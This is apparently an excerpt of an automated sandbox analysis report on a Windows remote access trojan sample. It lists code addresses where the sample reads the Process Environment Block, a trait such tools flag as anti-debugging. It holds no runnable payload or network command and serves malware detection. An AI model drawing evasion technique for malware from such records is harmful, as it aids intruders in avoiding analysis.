                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228C2BE mov ecx, dword ptr fs:[00000030h]0_2_0228C2BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A328C mov eax, dword ptr fs:[00000030h]0_2_022A328C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC29B mov eax, dword ptr fs:[00000030h]0_2_022AC29B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC29B mov eax, dword ptr fs:[00000030h]0_2_022AC29B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC29B mov ecx, dword ptr fs:[00000030h]0_2_022AC29B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3294 mov eax, dword ptr fs:[00000030h]0_2_022C3294
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3294 mov eax, dword ptr fs:[00000030h]0_2_022C3294
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3294 mov eax, dword ptr fs:[00000030h]0_2_022C3294
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D62C9 mov eax, dword ptr fs:[00000030h]0_2_022D62C9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229E2DE mov eax, dword ptr fs:[00000030h]0_2_0229E2DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229E2DE mov eax, dword ptr fs:[00000030h]0_2_0229E2DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229E2DE mov eax, dword ptr fs:[00000030h]0_2_0229E2DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022812DF mov eax, dword ptr fs:[00000030h]0_2_022812DF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022812DF mov eax, dword ptr fs:[00000030h]0_2_022812DF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022812DF mov eax, dword ptr fs:[00000030h]0_2_022812DF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B4321 mov eax, dword ptr fs:[00000030h]0_2_022B4321
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B4321 mov eax, dword ptr fs:[00000030h]0_2_022B4321
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228531A mov eax, dword ptr fs:[00000030h]0_2_0228531A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228531A mov ecx, dword ptr fs:[00000030h]0_2_0228531A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C331F mov eax, dword ptr fs:[00000030h]0_2_022C331F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A736E mov eax, dword ptr fs:[00000030h]0_2_022A736E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A736E mov eax, dword ptr fs:[00000030h]0_2_022A736E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229D37E mov eax, dword ptr fs:[00000030h]0_2_0229D37E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229D37E mov ecx, dword ptr fs:[00000030h]0_2_0229D37E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229D37E mov eax, dword ptr fs:[00000030h]0_2_0229D37E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF34E mov eax, dword ptr fs:[00000030h]0_2_022BF34E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF34E mov eax, dword ptr fs:[00000030h]0_2_022BF34E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF34E mov eax, dword ptr fs:[00000030h]0_2_022BF34E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF34E mov ecx, dword ptr fs:[00000030h]0_2_022BF34E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h]0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A33AB mov ecx, dword ptr fs:[00000030h]0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h]0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h]0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h]0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h]0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D43A7 mov eax, dword ptr fs:[00000030h]0_2_022D43A7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DB3A6 mov eax, dword ptr fs:[00000030h]0_2_022DB3A6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DE3BE mov ecx, dword ptr fs:[00000030h]0_2_022DE3BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C439E mov eax, dword ptr fs:[00000030h]0_2_022C439E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C439E mov ecx, dword ptr fs:[00000030h]0_2_022C439E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E03EE mov eax, dword ptr fs:[00000030h]0_2_022E03EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E03EE mov eax, dword ptr fs:[00000030h]0_2_022E03EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CD3EE mov eax, dword ptr fs:[00000030h]0_2_022CD3EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DF3FB mov eax, dword ptr fs:[00000030h]0_2_022DF3FB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02281021 mov eax, dword ptr fs:[00000030h]0_2_02281021
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7002 mov eax, dword ptr fs:[00000030h]0_2_022D7002
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7002 mov eax, dword ptr fs:[00000030h]0_2_022D7002
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C1019 mov eax, dword ptr fs:[00000030h]0_2_022C1019
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02280015 mov eax, dword ptr fs:[00000030h]0_2_02280015
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB06E mov eax, dword ptr fs:[00000030h]0_2_022CB06E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228506F mov esi, dword ptr fs:[00000030h]0_2_0228506F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C107F mov eax, dword ptr fs:[00000030h]0_2_022C107F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C004E mov eax, dword ptr fs:[00000030h]0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229F044 mov eax, dword ptr fs:[00000030h]0_2_0229F044
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229F044 mov eax, dword ptr fs:[00000030h]0_2_0229F044
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229F044 mov eax, dword ptr fs:[00000030h]0_2_0229F044
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022800AE mov eax, dword ptr fs:[00000030h]0_2_022800AE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022800AE mov eax, dword ptr fs:[00000030h]0_2_022800AE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D60A7 mov eax, dword ptr fs:[00000030h]0_2_022D60A7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D60A7 mov eax, dword ptr fs:[00000030h]0_2_022D60A7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D60A7 mov eax, dword ptr fs:[00000030h]0_2_022D60A7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C60BE mov ecx, dword ptr fs:[00000030h]0_2_022C60BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D4088 mov eax, dword ptr fs:[00000030h]0_2_022D4088
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D4088 mov eax, dword ptr fs:[00000030h]0_2_022D4088
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D4088 mov eax, dword ptr fs:[00000030h]0_2_022D4088
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF09C mov eax, dword ptr fs:[00000030h]0_2_022BF09C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF09C mov ecx, dword ptr fs:[00000030h]0_2_022BF09C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02280094 mov eax, dword ptr fs:[00000030h]0_2_02280094
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02280094 mov eax, dword ptr fs:[00000030h]0_2_02280094
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B30FC mov eax, dword ptr fs:[00000030h]0_2_022B30FC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B30FC mov eax, dword ptr fs:[00000030h]0_2_022B30FC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AB0D5 mov ecx, dword ptr fs:[00000030h]0_2_022AB0D5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AB0D5 mov eax, dword ptr fs:[00000030h]0_2_022AB0D5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B111E mov eax, dword ptr fs:[00000030h]0_2_022B111E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B111E mov eax, dword ptr fs:[00000030h]0_2_022B111E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B111E mov eax, dword ptr fs:[00000030h]0_2_022B111E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B111E mov eax, dword ptr fs:[00000030h]0_2_022B111E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6115 mov eax, dword ptr fs:[00000030h]0_2_022D6115
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229D16F mov eax, dword ptr fs:[00000030h]0_2_0229D16F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229D16F mov eax, dword ptr fs:[00000030h]0_2_0229D16F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229D16F mov eax, dword ptr fs:[00000030h]0_2_0229D16F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov eax, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov eax, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov eax, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov eax, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov ecx, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D61EF mov eax, dword ptr fs:[00000030h]0_2_022D61EF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC1ED mov eax, dword ptr fs:[00000030h]0_2_022AC1ED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC1ED mov eax, dword ptr fs:[00000030h]0_2_022AC1ED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC1ED mov eax, dword ptr fs:[00000030h]0_2_022AC1ED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC1ED mov eax, dword ptr fs:[00000030h]0_2_022AC1ED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC63D mov eax, dword ptr fs:[00000030h]0_2_022CC63D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228C60B mov eax, dword ptr fs:[00000030h]0_2_0228C60B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228C60B mov ecx, dword ptr fs:[00000030h]0_2_0228C60B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228C60B mov eax, dword ptr fs:[00000030h]0_2_0228C60B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C461E mov eax, dword ptr fs:[00000030h]0_2_022C461E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C461E mov ecx, dword ptr fs:[00000030h]0_2_022C461E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF660 mov eax, dword ptr fs:[00000030h]0_2_022BF660
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF660 mov eax, dword ptr fs:[00000030h]0_2_022BF660
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0671 mov eax, dword ptr fs:[00000030h]0_2_022E0671
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0671 mov eax, dword ptr fs:[00000030h]0_2_022E0671
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD643 mov eax, dword ptr fs:[00000030h]0_2_022BD643
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD643 mov ecx, dword ptr fs:[00000030h]0_2_022BD643
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC652 mov eax, dword ptr fs:[00000030h]0_2_022DC652
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC652 mov eax, dword ptr fs:[00000030h]0_2_022DC652
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC652 mov eax, dword ptr fs:[00000030h]0_2_022DC652
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC652 mov eax, dword ptr fs:[00000030h]0_2_022DC652
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CD68E mov eax, dword ptr fs:[00000030h]0_2_022CD68E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B9682 mov eax, dword ptr fs:[00000030h]0_2_022B9682
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B9682 mov ecx, dword ptr fs:[00000030h]0_2_022B9682
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228B6E9 mov eax, dword ptr fs:[00000030h]0_2_0228B6E9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D6FC mov eax, dword ptr fs:[00000030h]0_2_0227D6FC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D66F6 mov eax, dword ptr fs:[00000030h]0_2_022D66F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D66F6 mov eax, dword ptr fs:[00000030h]0_2_022D66F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A76DC mov eax, dword ptr fs:[00000030h]0_2_022A76DC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A76DC mov eax, dword ptr fs:[00000030h]0_2_022A76DC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD72F mov eax, dword ptr fs:[00000030h]0_2_022BD72F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD72F mov eax, dword ptr fs:[00000030h]0_2_022BD72F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DB736 mov eax, dword ptr fs:[00000030h]0_2_022DB736
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DB736 mov eax, dword ptr fs:[00000030h]0_2_022DB736
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C870E mov ecx, dword ptr fs:[00000030h]0_2_022C870E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B070E mov eax, dword ptr fs:[00000030h]0_2_022B070E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B070E mov eax, dword ptr fs:[00000030h]0_2_022B070E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B570E mov eax, dword ptr fs:[00000030h]0_2_022B570E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C476E mov eax, dword ptr fs:[00000030h]0_2_022C476E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C476E mov ecx, dword ptr fs:[00000030h]0_2_022C476E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D877F mov eax, dword ptr fs:[00000030h]0_2_022D877F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0747 mov eax, dword ptr fs:[00000030h]0_2_022E0747
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0747 mov eax, dword ptr fs:[00000030h]0_2_022E0747
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228C7A8 mov eax, dword ptr fs:[00000030h]0_2_0228C7A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA7A4 mov eax, dword ptr fs:[00000030h]0_2_022CA7A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AE783 mov eax, dword ptr fs:[00000030h]0_2_022AE783
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE7FE mov eax, dword ptr fs:[00000030h]0_2_022BE7FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C97CE mov ecx, dword ptr fs:[00000030h]0_2_022C97CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CD7CE mov eax, dword ptr fs:[00000030h]0_2_022CD7CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DE7DE mov eax, dword ptr fs:[00000030h]0_2_022DE7DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DE7DE mov ecx, dword ptr fs:[00000030h]0_2_022DE7DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B142E mov eax, dword ptr fs:[00000030h]0_2_022B142E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD42E mov eax, dword ptr fs:[00000030h]0_2_022BD42E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A443F mov eax, dword ptr fs:[00000030h]0_2_022A443F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD468 mov eax, dword ptr fs:[00000030h]0_2_022BD468
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229F44E mov eax, dword ptr fs:[00000030h]0_2_0229F44E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CD45E mov eax, dword ptr fs:[00000030h]0_2_022CD45E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CA4BE mov eax, dword ptr fs:[00000030h]0_2_022CA4BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B048E mov eax, dword ptr fs:[00000030h]0_2_022B048E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B048E mov eax, dword ptr fs:[00000030h]0_2_022B048E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B048E mov eax, dword ptr fs:[00000030h]0_2_022B048E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B048E mov eax, dword ptr fs:[00000030h]0_2_022B048E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D648A mov eax, dword ptr fs:[00000030h]0_2_022D648A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D648A mov eax, dword ptr fs:[00000030h]0_2_022D648A
